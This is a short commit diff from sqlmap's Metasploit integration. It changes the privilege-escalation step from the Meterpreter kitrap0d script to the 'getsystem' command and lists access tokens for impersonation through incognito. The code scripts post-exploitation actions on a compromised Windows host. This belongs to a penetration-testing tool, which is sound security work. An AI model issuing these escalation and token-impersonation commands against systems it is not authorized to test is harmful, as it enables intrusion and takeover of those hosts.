--priv-esc now relies on more powerful and complete getsystem Meterpreter command that also implements kitrap0d as 4th technique

This commit is contained in:
Bernardo Damele 2010-01-29 14:57:33 +00:00
parent c20b196518
commit 767c67e37a


@ -448,23 +448,25 @@ class Metasploit:
proc.stdin.write("use priv\n")
proc.stdin.write("use sniffer\n")
proc.stdin.write("sysinfo\n")
proc.stdin.write("getuid\n")
if conf.privEsc:
print
infoMsg = "trying to escalate privileges using "
infoMsg += "kitrap0d script"
infoMsg = "trying to escalate privileges using Meterpreter"
infoMsg += "'getsystem' command which tries different "
infoMsg += "techniques, including kitrap0d"
logger.info(infoMsg)
proc.stdin.write("run kitrap0d\n")
proc.stdin.write("getsystem\n")
infoMsg = "displaying the list of Access Tokens availables. "
infoMsg += "Choose which user you want to impersonate by "
infoMsg += "using incognito's command 'impersonate_token'"
infoMsg += "using incognito's command 'impersonate_token' if "
infoMsg += "'getsystem' did not success to elevate privileges"
logger.info(infoMsg)
proc.stdin.write("list_tokens -u\n")
proc.stdin.write("getuid\n")